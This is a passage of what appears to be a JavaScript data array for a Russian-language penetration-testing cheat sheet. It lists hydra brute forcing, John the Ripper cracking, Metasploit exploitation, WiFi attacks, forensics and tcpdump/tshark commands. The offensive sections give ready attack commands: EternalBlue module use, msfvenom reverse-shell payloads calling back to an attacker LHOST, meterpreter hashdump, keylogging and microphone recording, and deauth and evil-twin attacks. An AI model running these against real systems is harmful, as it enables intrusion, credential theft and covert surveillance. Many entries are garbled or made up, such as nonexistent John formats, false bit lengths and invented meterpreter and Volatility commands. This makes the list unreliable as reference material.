      { cmd: "hydra -L users.txt -P rockyou.txt smb://target", desc: "hydra: SMB (NetBIOS)" },
      { cmd: "hydra -L users.txt -P rockyou.txt smbnt://target", desc: "hydra: SMB (NT)" },
      { cmd: "hydra -L users.txt -P rockyou.txt cisco://target", desc: "hydra: Cisco (enable)" },
      { cmd: "hydra -L users.txt -P rockyou.txt cisco-enable://target", desc: "hydra: Cisco enable" },
      { cmd: "hydra -L users.txt -P rockyou.txt h323://target", desc: "hydra: H.323" },
      { cmd: "hydra -L users.txt -P rockyou.txt sip://target", desc: "hydra: SIP" },
      { cmd: "hydra -L users.txt -P rockyou.txt socks5://target", desc: "hydra: SOCKS5" },
      { cmd: "hydra -L users.txt -P rockyou.txt http-get://target", desc: "hydra: HTTP GET-форма" },
      { cmd: "hydra -L users.txt -P rockyou.txt http-post://target", desc: "hydra: HTTP POST" },
      { cmd: "hydra -L users.txt -P rockyou.txt http-proxy://target", desc: "hydra: HTTP-прокси" },
      { cmd: "hydra -L users.txt -P rockyou.txt http-head://target", desc: "hydra: HTTP HEAD" },
      { cmd: "hydra -L users.txt -P rockyou.txt http-form://target", desc: "hydra: HTTP form (user=FUZZ&pass=FUZZ)" },
      { cmd: "hydra -L users.txt -P rockyou.txt https-get://target", desc: "hydra: HTTPS GET" },
      { cmd: "hydra -L users.txt -P rockyou.txt https-post://target", desc: "hydra: HTTPS POST" },
      { cmd: "hydra -L users.txt -P rockyou.txt https-head://target", desc: "hydra: HTTPS HEAD" },
      { cmd: "hydra -L users.txt -P rockyou.txt ldap://target", desc: "hydra: LDAP" },
      { cmd: "hydra -L users.txt -P rockyou.txt ldaps://target", desc: "hydra: LDAPS" },
      { cmd: "hydra -L users.txt -P rockyou.txt ldap2://target", desc: "hydra: LDAPv2" },
      { cmd: "hydra -L users.txt -P rockyou.txt ldap3://target", desc: "hydra: LDAPv3" },
      { cmd: "hydra -L users.txt -P rockyou.txt svn://target", desc: "hydra: Subversion" },
      { cmd: "hydra -L users.txt -P rockyou.txt cvs://target", desc: "hydra: CVS" },
      { cmd: "hydra -L users.txt -P rockyou.txt mssql://target", desc: "hydra: MSSQL" },
      { cmd: "hydra -L users.txt -P rockyou.txt mysql://target", desc: "hydra: MySQL" },
      { cmd: "hydra -L users.txt -P rockyou.txt mysql5://target", desc: "hydra: MySQL 4.1+" },
      { cmd: "hydra -L users.txt -P rockyou.txt oracle-s://target", desc: "hydra: Oracle (SQL*Net)" },
      { cmd: "hydra -L users.txt -P rockyou.txt pgsql://target", desc: "hydra: PostgreSQL" },
      { cmd: "hydra -L users.txt -P rockyou.txt redis://target", desc: "hydra: Redis" },
      { cmd: "hydra -L users.txt -P rockyou.txt vmauthd://target", desc: "hydra: VMware vmauthd" },
      { cmd: "hydra -L users.txt -P rockyou.txt x11://target", desc: "hydra: X11" },
      { cmd: "hydra -L users.txt -P rockyou.txt irc://target", desc: "hydra: IRC" },
      { cmd: "hydra -L users.txt -P rockyou.txt jupyter://target", desc: "hydra: Jupyter Notebook" },
      { cmd: "hydra -L users.txt -P rockyou.txt kerberos-4://target", desc: "hydra: Kerberos 4" },
      { cmd: "hydra -L users.txt -P rockyou.txt lotus-notes://target", desc: "hydra: Lotus Notes" },
      { cmd: "hydra -L users.txt -P rockyou.txt pcnns://target", desc: "hydra: PC-NN Server" },
      { cmd: "hydra -L users.txt -P rockyou.txt pcserver://target", desc: "hydra: PC-Server" },
      { cmd: "hydra -L users.txt -P rockyou.txt snmp://target", desc: "hydra: SNMP (community)" },
      { cmd: "hydra -L users.txt -P rockyou.txt rdp://target", desc: "hydra: RDP" },
      { cmd: "hydra -L users.txt -P rockyou.txt afp://target", desc: "hydra: AFP (Apple)" },
      { cmd: "hydra -l admin -P rockyou.txt ssh://target", desc: "Один логин × словарь." },
      { cmd: "hydra -l admin -p 'pass' ssh://target", desc: "Одна пара (проверка)." },
      { cmd: "hydra -t 4 -w 15 ssh://target", desc: "4 параллельных потока, 15 попыток/сек." },
      { cmd: "hydra -o out.txt ssh://target", desc: "Вывод в файл." },
      { cmd: "hydra -f ssh://target", desc: "Стоп после первой пары." },
      { cmd: "hydra -V", desc: "Версия hydra." },
    ] },
    { name: "Password (john)", entries: [
      { cmd: "john --wordlist=rockyou.txt --format=NT hash.txt", desc: "John: Windows NT-хеш (448-бит)." },
      { cmd: "john --wordlist=rockyou.txt --format=LM hash.txt", desc: "John: Устаревший LAN Manager (16-бит по хвостам)." },
      { cmd: "john --wordlist=rockyou.txt --format=Raw-MD5 hash.txt", desc: "John: Сырой MD5." },
      { cmd: "john --wordlist=rockyou.txt --format=Raw-SHA1 hash.txt", desc: "John: Сырой SHA-1." },
      { cmd: "john --wordlist=rockyou.txt --format=Raw-SHA256 hash.txt", desc: "John: Сырой SHA-256." },
      { cmd: "john --wordlist=rockyou.txt --format=Raw-SHA512 hash.txt", desc: "John: Сырой SHA-512." },
      { cmd: "john --wordlist=rockyou.txt --format=bcrypt hash.txt", desc: "John: bcrypt ($2a/$2b/$2y)." },
      { cmd: "john --wordlist=rockyou.txt --format=phpass hash.txt", desc: "John: MD5-based phpass (Drupal, old WP)." },
      { cmd: "john --wordlist=rockyou.txt --format=WPA hash.txt", desc: "John: WPA/WPA2 PMKID-хеш." },
      { cmd: "john --wordlist=rockyou.txt --format=OpenSSH hash.txt", desc: "John: OpenSSH-хеш (authorized_keys)." },
      { cmd: "john --wordlist=rockyou.txt --format=Kerberos-4 hash.txt", desc: "John: Kerberos 4." },
      { cmd: "john --wordlist=rockyou.txt --format=Kerberos-5 hash.txt", desc: "John: Kerberos 5 (AS-REQ/TGS-REP)." },
      { cmd: "john --wordlist=rockyou.txt --format=DPAP hash.txt", desc: "John: Windows DPAP (master key)." },
      { cmd: "john --wordlist=rockyou.txt --format=NetNTLMv1 hash.txt", desc: "John: NTLMv1 challenge-response." },
      { cmd: "john --wordlist=rockyou.txt --format=NetNTLMv2 hash.txt", desc: "John: NTLMv2 challenge-response." },
      { cmd: "john --wordlist=rockyou.txt --format=Cisco-7 hash.txt", desc: "John: Cisco type-7 (обратимый XOR)." },
      { cmd: "john --wordlist=rockyou.txt --format=Cisco-ios hash.txt", desc: "John: Cisco IOS типа 0/4/5/8." },
      { cmd: "john --wordlist=rockyou.txt --format=zip hash.txt", desc: "John: ZIP (PKZIP) пароль." },
      { cmd: "john --wordlist=rockyou.txt --format=7z hash.txt", desc: "John: 7z-архив." },
      { cmd: "john --wordlist=rockyou.txt --format=RAR5 hash.txt", desc: "John: RAR5-архив." },
      { cmd: "john --wordlist=rockyou.txt --format=gpg-sym hash.txt", desc: "John: GPG симметричное шифрование." },
      { cmd: "john --wordlist=rockyou.txt --format=pdf hash.txt", desc: "John: Adobe PDF-пароль." },
      { cmd: "john --wordlist=rockyou.txt --format=office hash.txt", desc: "John: MS Office (docx/xlsx) пароль." },
      { cmd: "john --wordlist=rockyou.txt --format=LastPass1 hash.txt", desc: "John: LastPass v1." },
      { cmd: "john --wordlist=rockyou.txt --format=KeePassX hash.txt", desc: "John: KeePassX-бд." },
      { cmd: "john --wordlist=rockyou.txt --format=Android-FDE hash.txt", desc: "John: Android Full Disk Encryption." },
      { cmd: "john --wordlist=rockyou.txt --format=Bitcoin-Wallet hash.txt", desc: "John: Bitcoin-кошелёк (bitaddress)." },
      { cmd: "john --wordlist=rockyou.txt --format=Putty-Session hash.txt", desc: "John: PuTTY-сессия." },
      { cmd: "john --wordlist=rockyou.txt --format=SSH-SSHA hash.txt", desc: "John: SSHA из /etc/shadow (OpenSSH)." },
      { cmd: "john --wordlist=rockyou.txt --format=md5crypt$SHA512$ hash.txt", desc: "John: Linux /etc/shadow y$ (SHA-512 crypt)." },
      { cmd: "john --wordlist=rockyou.txt --format=LM-DES hash.txt", desc: "John: DES LM (по хвостам)." },
      { cmd: "john --wordlist=rockyou.txt --format=3DES-168 hash.txt", desc: "John: 3DES-168." },
      { cmd: "john --wordlist=rockyou.txt --format=DES-64 hash.txt", desc: "John: DES-64." },
      { cmd: "john --wordlist=rockyou.txt --format=Blowfish-96 hash.txt", desc: "John: Blowfish-96." },
      { cmd: "john --wordlist=rockyou.txt --format=Twofish-192 hash.txt", desc: "John: Twofish-192." },
      { cmd: "john --wordlist=rockyou.txt --format=GOST-28147-89 hash.txt", desc: "John: GOST 28147-89." },
      { cmd: "john --wordlist=rockyou.txt --format=Salsa20-256 hash.txt", desc: "John: Salsa20-256." },
      { cmd: "john --wordlist=rockyou.txt --format=ChaCha20-256 hash.txt", desc: "John: ChaCha20-256." },
      { cmd: "john --wordlist=rockyou.txt --format=Whirlpool hash.txt", desc: "John: Whirlpool." },
      { cmd: "john --wordlist=rockyou.txt --format=GOST-R-34.11-94 hash.txt", desc: "John: GOST R 34.11-94." },
      { cmd: "john --wordlist=rockyou.txt --format=SHA3-256 hash.txt", desc: "John: SHA3-256." },
      { cmd: "john --wordlist=rockyou.txt --format=Keccak-256 hash.txt", desc: "John: Keccak-256." },
      { cmd: "john --wordlist=rockyou.txt --format=BLAKE2b-512 hash.txt", desc: "John: BLAKE2b-512." },
      { cmd: "john --wordlist=rockyou.txt --format=HMAC-SHA256 hash.txt", desc: "John: HMAC-SHA256." },
      { cmd: "john --wordlist=rockyou.txt --format=PBKDF2-HMAC-SHA256 hash.txt", desc: "John: PBKDF2-HMAC-SHA256." },
      { cmd: "john --wordlist=rockyou.txt --format=Scrypt hash.txt", desc: "John: Scrypt." },
      { cmd: "john --wordlist=rockyou.txt --format=Argon2id hash.txt", desc: "John: Argon2id." },
      { cmd: "john --show hash.txt", desc: "Показать найденные пароли." },
      { cmd: "john --list=formats", desc: "Список всех форматов." },
      { cmd: "john --format=help", desc: "Справка по формату." },
      { cmd: "john --incremental hash.txt", desc: "Брутфорс (маски a[1..8])." },
      { cmd: "john --rules --wordlist=rockyou.txt hash.txt", desc: "Словарь + морфологические правила." },
      { cmd: "john --wordlist=rockyou.txt --max-length=8 hash.txt", desc: "Лимит длины." },
      { cmd: "john --min-length=4 --max-length=12 --wordlist=rockyou.txt hash.txt", desc: "Диапазон длин." },
      { cmd: "john --fork=4 hash.txt", desc: "4 процесса (по ядрам)." },
      { cmd: "john --session=work --fork=2 hash.txt", desc: "Именованная сессия." },
      { cmd: "john --restore", desc: "Восстановить прерванную сессию." },
      { cmd: "john --status", desc: "Статус текущей сессии." },
    ] },
    { name: "Exploitation", entries: [
      { cmd: "msfconsole", desc: "Metasploit Framework." },
      { cmd: "msfconsole -q", desc: "Без приветствия." },
      { cmd: "search type:exploit", desc: "Поиск exploits." },
      { cmd: "search name struts2", desc: "Поиск по имени." },
      { cmd: "search cve:2017-0144", desc: "Поиск по CVE." },
      { cmd: "search advanced platform:linux service:ssh", desc: "Поиск по ОС + сервису." },
      { cmd: "use exploit/multi/handler", desc: "Универсальный слушатель." },
      { cmd: "use exploit/windows/smb/ms17_010_eternalblue", desc: "EternalBlue (MS17-010)." },
      { cmd: "use exploit/multi/smb/ms17_010_eternalblue", desc: "EternalBlue (multi)." },
      { cmd: "use exploit/unix/ssh/openssh_cve_2024_6387", desc: "RegreSSHion (OpenSSH 8.5-9.7p1)." },
      { cmd: "use exploit/linux/samba/is_known_pipename", desc: "Samba is_known_pipename RCE." },
      { cmd: "use exploit/linux/samba/trans2open_unixpath", desc: "Samba trans2open unixpath RCE." },
      { cmd: "use exploit/linux/samba/set_nt_transaction", desc: "Samba set_nt_transaction RCE." },
      { cmd: "use exploit/windows/smb/powershell_emp", desc: "PowerShell-эксплойт SMB." },
      { cmd: "use exploit/windows/smb/ms17_010_command", desc: "MS17-010: выполнение команды." },
      { cmd: "use exploit/windows/smb/ms17_010_psexec", desc: "MS17-010: PsExec." },
      { cmd: "use exploit/windows/smb/ms17_010_extra", desc: "MS17-010: дополнительные payload." },
      { cmd: "show options", desc: "Опции модуля." },
      { cmd: "show advanced", desc: "Расширенные опции." },
      { cmd: "show targets", desc: "Цели." },
      { cmd: "show payloads", desc: "Пейлоады модуля." },
      { cmd: "set RHOSTS 192.168.1.10", desc: "Целевые хосты." },
      { cmd: "set LHOST 192.168.1.5", desc: "Наш IP." },
      { cmd: "set LPORT 4444", desc: "Порт слушателя." },
      { cmd: "set PAYLOAD windows/x64/meterpreter/reverse_tcp", desc: "Пейлоад." },
      { cmd: "set EXITFUNC thread", desc: "Способ выхода." },
      { cmd: "set TARGET 1", desc: "Выбор цели." },
      { cmd: "check", desc: "Автопроверка уязвимости." },
      { cmd: "exploit", desc: "Запуск." },
      { cmd: "run -j -c 'shell'", desc: "Фоновая эксплуатация + shell." },
      { cmd: "jobs", desc: "Фоновые задачи." },
      { cmd: "background", desc: "В фон." },
      { cmd: "bg 1", desc: "Сессию 1 в фон." },
      { cmd: "sessions -l", desc: "Список сессий." },
      { cmd: "sessions -i 1", desc: "Перейти в сессию 1." },
      { cmd: "bgkill 1", desc: "Убить фоновую сессию." },
      { cmd: "resource /root/x.rc", desc: "Загрузить resource-скрипт." },
      { cmd: "info", desc: "Инфо о модуле." },
      { cmd: "db_status", desc: "Статус базы Metasploit." },
      { cmd: "db_nmap 192.168.1.0/24", desc: "Nmap в базу MSF." },
      { cmd: "hosts", desc: "Хосты из базы." },
      { cmd: "services", desc: "Сервисы из базы." },
      { cmd: "vulnerabilities", desc: "Уязвимости из базы." },
      { cmd: "workspace -a lab1", desc: "Создать workspace." },
      { cmd: "notes -a 'target: x'", desc: "Заметка." },
      { cmd: "meterpreter > shell", desc: "Обычный shell." },
      { cmd: "meterpreter > sysinfo", desc: "Инфо о системе." },
      { cmd: "meterpreter > getuid", desc: "Текущий пользователь." },
      { cmd: "meterpreter > getos", desc: "ОС." },
      { cmd: "meterpreter > hashdump", desc: "Дамп NT-хешей (Windows, elevated)." },
      { cmd: "meterpreter > mimikatz", desc: "Запуск mimikatz." },
      { cmd: "meterpreter > priv-dump", desc: "Экспорт учётных данных." },
      { cmd: "meterpreter > load kiwi", desc: "Модуль kiwi." },
      { cmd: "meterpreter > kiwi_cmd kerberos", desc: "Kerberos-тикеты." },
      { cmd: "meterpreter > kiwi_cmd lsadump", desc: "LSA-дамп." },
      { cmd: "meterpreter > record_mic", desc: "Запись микрофона." },
      { cmd: "meterpreter > record_play f.wav", desc: "Проиграть файл." },
      { cmd: "meterpreter > screencap", desc: "Скриншот." },
      { cmd: "meterpreter > keylog_start", desc: "Кейлоггер: старт." },
      { cmd: "meterpreter > keylog_get", desc: "Снять кейлог." },
      { cmd: "meterpreter > keylog_stop", desc: "Стоп." },
      { cmd: "meterpreter > ps", desc: "Процессы." },
      { cmd: "meterpreter > migrate 1234", desc: "Мигрировать в процесс." },
      { cmd: "meterpreter > execute -f cmd.exe -i", desc: "Запустить exe (интерактивно)." },
      { cmd: "meterpreter > upload /root/x.exe C:\\x.exe", desc: "Загрузить файл." },
      { cmd: "meterpreter > download C:\\secret.txt /root/", desc: "Скачать файл." },
      { cmd: "meterpreter > pwd", desc: "Текущий каталог." },
      { cmd: "meterpreter > cd C:\\Windows", desc: "Сменить каталог." },
      { cmd: "meterpreter > ls", desc: "Файлы." },
      { cmd: "meterpreter > rm C:\\temp\\x.txt", desc: "Удалить файл." },
      { cmd: "meterpreter > mkdir C:\\temp\\t", desc: "Создать каталог." },
      { cmd: "meterpreter > clear", desc: "Очистить экран." },
      { cmd: "meterpreter > run post/multi/recon/localusers", desc: "Локальные пользователи." },
      { cmd: "meterpreter > run post/windows/gather/enum_adusers", desc: "AD-пользователи." },
      { cmd: "meterpreter > run post/windows/gather/credentials/cmdkey", desc: "Сохранённые ключи." },
      { cmd: "meterpreter > run post/windows/gather/credentials/lsass", desc: "LSASS-дамп." },
      { cmd: "meterpreter > run post/windows/privilege/escalate/getuid", desc: "Проверка прав." },
      { cmd: "meterpreter > run post/windows/manage/enable_uac", desc: "Включить UAC." },
      { cmd: "msfvenom -l payloads", desc: "Список пейлоадов." },
      { cmd: "msfvenom -l encoders", desc: "Список энкодеров." },
      { cmd: "msfvenom -l formats", desc: "Список форматов." },
      { cmd: "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe -o shell.exe", desc: "Windows x64 EXE." },
      { cmd: "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 5", desc: "EXE + shikata_ga_nai." },
      { cmd: "msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf", desc: "Linux x64 ELF." },
      { cmd: "msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf", desc: "Linux x86 ELF." },
    ] },
    { name: "WiFi attacks", entries: [
      { cmd: "airmon-ng list", desc: "Список интерфейсов + monitor-режим." },
      { cmd: "airmon-ng start wlan0", desc: "Включить monitor-режим." },
      { cmd: "airmon-ng stop wlan0mon", desc: "Выключить monitor." },
      { cmd: "airmon-ng check kill", desc: "Убить мешающие сервисы (NetworkManager)." },
      { cmd: "airmon-ng", desc: "Статус monitor-интерфейсов." },
      { cmd: "airodump-ng wlan0mon", desc: "Слушать сети (BSS)." },
      { cmd: "airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF wlan0mon", desc: "Фиксация канала + AP." },
      { cmd: "airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon", desc: "Снять трафик сети в cap-файлы." },
      { cmd: "airodump-ng --wpa-psk wlan0mon", desc: "Пассивный захват 4-way handshake." },
      { cmd: "aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon", desc: "Deauth-атака (5 пакетов)." },
      { cmd: "aireplay-ng --deauth 999999 -a AA:BB:CC:DD:EE:FF wlan0mon", desc: "Deauth: разлогинить всех." },
      { cmd: "aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon", desc: "Deauth конкретной станции." },
      { cmd: "aireplay-ng --deauth 3 -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 wlan0mon", desc: "Deauth от лица клиента." },
      { cmd: "aireplay-ng --interactive wlan0mon", desc: "Интерактивный replay." },
      { cmd: "aireplay-ng --channel 6 --ignore-negative wlan0mon", desc: "Игнорировать negative-ответы." },
      { cmd: "aireplay-ng --fakeauth 10 -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 wlan0mon", desc: "Fake-auth (отказ в сервисе)." },
      { cmd: "airolib-ng wlan0mon -i 192.168.1.0/24", desc: "Автоматизация aircrack-процесса." },
      { cmd: "wifite --show", desc: "Список интерфейсов (wifite)." },
      { cmd: "wifite -i wlan0mon", desc: "Авто-атака: handshake + deauth + crack." },
      { cmd: "wifite -i wlan0mon --pmkid", desc: "Сбор PMKID (без handshake)." },
      { cmd: "wifite -i wlan0mon -w rockyou.txt", desc: "Словарь для crack." },
      { cmd: "wifite -i wlan0mon --nopassive", desc: "Без пассивного слушания." },
      { cmd: "wifite -i wlan0mon -w wpa.dic --wpa-only", desc: "Только WPA/WPA2." },
      { cmd: "aircrack-ng -w rockyou.txt cap-01.cap", desc: "Брут WPA-PSK из handshake." },
      { cmd: "aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF cap-01.cap", desc: "Брут по BSSID." },
      { cmd: "aircrack-ng cap-01.cap", desc: "Анализ pcap (без брута)." },
      { cmd: "aircrack-ng -K <pmkid-hex> cap-01.cap", desc: "Атака по PMKID." },
      { cmd: "reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv", desc: "WPS-атака (Pixie Dust/brute)." },
      { cmd: "reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K", desc: "Быстрый Pixie Dust." },
      { cmd: "bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -m deauth", desc: "Bully: WPS-деавтх." },
      { cmd: "hcxdumptool -i wlan0mon -o cap.pcapng", desc: "Сбор PMKID + handshake (hcxdumptool)." },
      { cmd: "hcxpcapngtool -o hash.hc226 cap.pcapng", desc: "Конверт pcapng → hcx226." },
      { cmd: "hcxpcapngtool -o hash.22000 cap.pcapng", desc: "hcx22000 (для hashcat -m 22000)." },
      { cmd: "eaphammer -i wlan0mon", desc: "Evil twin (EAP)." },
      { cmd: "hostapd-mana", desc: "Evil twin (WPA) + MITM." },
      { cmd: "hostapd-mana -i wlan0mon -c 6 -S", desc: "Evil twin: старт." },
      { cmd: "wifite --kill", desc: "Убить wifite-процессы." },
      { cmd: "wifite --help", desc: "Справка wifite." },
      { cmd: "aircrack-ng --help", desc: "Справка aircrack-ng." },
      { cmd: "aireplay-ng --help", desc: "Справка aireplay-ng." },
    ] },
    { name: "Forensics", entries: [
      { cmd: "binwalk file.bin", desc: "Энтропия + вложенные файлы (firmware)." },
      { cmd: "binwalk -e file.bin", desc: "Извлечь вложенные файлы." },
      { cmd: "binwalk -M file.bin", desc: "Экстракция magic-методом." },
      { cmd: "foremost -t all -i disk.img -o out/", desc: "Восстановление файлов по сигнатурам." },
      { cmd: "foremost -t jpg -i disk.img -o out/", desc: "Только jpg." },
      { cmd: "scalpel -t all -i disk.img -o out/", desc: "Альтернатива foremost (быстрее)." },
      { cmd: "exiftool photo.jpg", desc: "EXIF-метаданные." },
      { cmd: "exiftool -a -G1 -s photo.jpg", desc: "Все метаданные (с группами)." },
      { cmd: "exiftool -s -G1 doc.docx", desc: "DOCX-метаданные." },
      { cmd: "exiftool -imagedata -s photo.jpg", desc: "Вложенные данные." },
      { cmd: "exiftool -overwrite_original -GPSLatitude= photo.jpg", desc: "Удалить GPS (steganography-подготовка)." },
      { cmd: "strings file.bin", desc: "Строки из бинарника." },
      { cmd: "strings -n 8 file.bin", desc: "Строки длиннее 8." },
      { cmd: "strings -el file.bin", desc: "16-bit little-endian строки (Unicode)." },
      { cmd: "strings -e b file.bin", desc: "8-bit big-endian." },
      { cmd: "xxd file.bin", desc: "Hex-дамп." },
      { cmd: "xxd -r -p hex.txt > out.bin", desc: "Из hex в бинарник." },
      { cmd: "hexdump -C file.bin", desc: "Классический hex." },
      { cmd: "od -A x -t x1z file.bin", desc: "Octal dump + ascii." },
      { cmd: "dd if=disk.img of=part.img bs=512 skip=1024 count=1000", desc: "Вырезать блок из образа." },
      { cmd: "ddrescue src.img dst.img map.log", desc: "Копирование с ошибкой (спасение)." },
      { cmd: "gddrescue src.img dst.img map.log", desc: "gddrescue (быстрее ddrescue)." },
      { cmd: "testdisk /dev/sdb", desc: "Поиск разделов (TestDisk)." },
      { cmd: "photorec /dev/sdb", desc: "Восстановление файлов (PhotoRec)." },
      { cmd: "fls -r -o 2048 disk.img", desc: "SleuthKit: список файлов (NTFS)." },
      { cmd: "fls -l -o 2048 disk.img", desc: "SleuthKit: с размерами." },
      { cmd: "mmls disk.img", desc: "SleuthKit: структура разделов." },
      { cmd: "blkls disk.img", desc: "SleuthKit: дерево разделов." },
      { cmd: "icat -o 2048 disk.img 0x123-0x124", desc: "SleuthKit: извлечь файл по i-node." },
      { cmd: "fls -m /mnt disk.img", desc: "SleuthKit: mount-карта (для icat)." },
      { cmd: "autopsy", desc: "GUI: SleuthKit + вёрстка (case)." },
      { cmd: "vol -f mem.lime windows.pslist", desc: "Volatility: список процессов (Windows)." },
      { cmd: "vol -f mem.lime windows.cmdline", desc: "Volatility: командные строки." },
      { cmd: "vol -f mem.lime windows.mbr", desc: "Volatility: MBR-инфо." },
      { cmd: "vol -f mem.lime windows.netstat", desc: "Volatility: соединения." },
      { cmd: "vol -f mem.lime windows.consvist", desc: "Volatility: консольные сессии." },
      { cmd: "vol -f mem.lime windows.registry.hivelist", desc: "Volatility: хиви-файлы." },
      { cmd: "vol -f mem.lime windows.hashdump", desc: "Volatility: NT-хеши из памяти." },
      { cmd: "vol -f mem.lime windows.malfind", desc: "Volatility: инъекты в память (malware)." },
      { cmd: "vol -f mem.lime windows.filescan", desc: "Volatility: файловая система из памяти." },
      { cmd: "vol -f mem.lime linux.pslist", desc: "Volatility: процессы (Linux)." },
      { cmd: "vol -f mem.lime linux.pstree", desc: "Volatility: дерево (Linux)." },
      { cmd: "vol -f mem.lime linux.netstat", desc: "Volatility: соединения (Linux)." },
      { cmd: "vol -f mem.lime linux.conntrack", desc: "Volatility: conntrack (Linux)." },
      { cmd: "vol -f mem.lime windows.hivex", desc: "Volatility: чтение registry hive." },
      { cmd: "vol -f mem.lime windows.ldrmodules", desc: "Volatility: загруженные DLL." },
      { cmd: "vol -f mem.lime windows.threads", desc: "Volatility: потоки." },
      { cmd: "vol -f mem.lime windows.dlllist", desc: "Volatility: DLL по процессам." },
      { cmd: "vol -f mem.lime windows.services", desc: "Volatility: сервисы Windows." },
      { cmd: "vol -f mem.lime windows.driverirqlongname", desc: "Volatility: драйверы." },
    ] },
    { name: "Capture & analysis", entries: [
      { cmd: "tcpdump -i eth0", desc: "Слушать интерфейс." },
      { cmd: "tcpdump -i eth0 -w capture.pcap", desc: "Запись в pcap." },
      { cmd: "tcpdump -i eth0 host 192.168.1.10", desc: "Только хост." },
      { cmd: "tcpdump -i eth0 port 443", desc: "Только порт." },
      { cmd: "tcpdump -i eth0 'host 10.0.0.1 and port 80'", desc: "Композиция BPF." },
      { cmd: "tcpdump -i eth0 -nn", desc: "Без reverse DNS." },
      { cmd: "tcpdump -i eth0 -c 1000", desc: "Стоп после 1000 пакетов." },
      { cmd: "tcpdump -i eth0 -n -s 0", desc: "Полный размер пакета." },
      { cmd: "tcpdump -i eth0 -r capture.pcap", desc: "Чтение pcap." },
      { cmd: "tcpdump -i eth0 -C 100 -W 10", desc: "Ротация 100MB x 10." },
      { cmd: "tcpdump -i eth0 -G 3600", desc: "Ротация по часу." },
      { cmd: "tcpdump -i eth0 'tcp[tcpflags] & (tcp-syn) != 0'", desc: "Только SYN." },
      { cmd: "tcpdump -i eth0 'tcp[tcpflags] & (tcp-rst) != 0'", desc: "Только RST." },
      { cmd: "tcpdump -i eth0 'udp and port 53'", desc: "DNS." },
      { cmd: "tcpdump -i eth0 'port 80' -A", desc: "Текст (ASCII)." },
      { cmd: "tcpdump -i eth0 'port 80' -X", desc: "Hex + ASCII." },
      { cmd: "tshark -i eth0", desc: "tshark: слушать." },
      { cmd: "tshark -i eth0 -a duration:60", desc: "60 секунд." },
      { cmd: "tshark -i eth0 -w out.pcapng", desc: "Запись pcapng." },
      { cmd: "tshark -r capture.pcap -Y 'http.request'", desc: "HTTP-запросы." },
      { cmd: "tshark -r capture.pcap -Y 'dns.qry.name contains \"example.com\"'", desc: "DNS к домену." },
      { cmd: "tshark -r capture.pcap -Y 'ip.addr == 192.168.1.10'", desc: "Пакеты хоста." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.flags.syn == 1'", desc: "SYN." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.flags.reset == 1'", desc: "RST." },
      { cmd: "tshark -r capture.pcap -Y 'tls.handshake.type == 1'", desc: "TLS ClientHello." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"POST\"'", desc: "HTTP POST." },
      { cmd: "tshark -r capture.pcap -Y 'http.response.code == 404'", desc: "HTTP 404." },
      { cmd: "tshark -r capture.pcap -Y 'http.response.code == 200'", desc: "HTTP 200." },
      { cmd: "tshark -r capture.pcap -Y 'http.response.code == 301'", desc: "HTTP 301." },
      { cmd: "tshark -r capture.pcap -Y 'http.response.code == 302'", desc: "HTTP 302." },
      { cmd: "tshark -r capture.pcap -Y 'http.response.code == 500'", desc: "HTTP 500." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"GET\"'", desc: "HTTP GET." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"PUT\"'", desc: "HTTP PUT." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"DELETE\"'", desc: "HTTP DELETE." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"OPTIONS\"'", desc: "HTTP OPTIONS." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"HEAD\"'", desc: "HTTP HEAD." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"PROPFIND\"'", desc: "WebDAV PROPFIND." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"PROPPATCH\"'", desc: "WebDAV PROPPATCH." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"MKCOL\"'", desc: "WebDAV MKCOL." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"COPY\"'", desc: "WebDAV COPY." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"MOVE\"'", desc: "WebDAV MOVE." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"LOCK\"'", desc: "WebDAV LOCK." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"UNLOCK\"'", desc: "WebDAV UNLOCK." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"SEARCH\"'", desc: "WebDAV SEARCH." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"PATCH\"'", desc: "HTTP PATCH." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"TRACE\"'", desc: "HTTP TRACE." },
      { cmd: "tshark -r capture.pcap -Y 'frame.len > 1000'", desc: "Крупные кадры." },
      { cmd: "tshark -r capture.pcap -Y 'ip.proto == 6'", desc: "Только TCP." },
      { cmd: "tshark -r capture.pcap -Y 'ip.proto == 17'", desc: "Только UDP." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.analysis.retransmission'", desc: "Retransmissions." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.analysis.zero_window'", desc: "Zero window." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.analysis.duplicate_ack'", desc: "Duplicate ACK." },
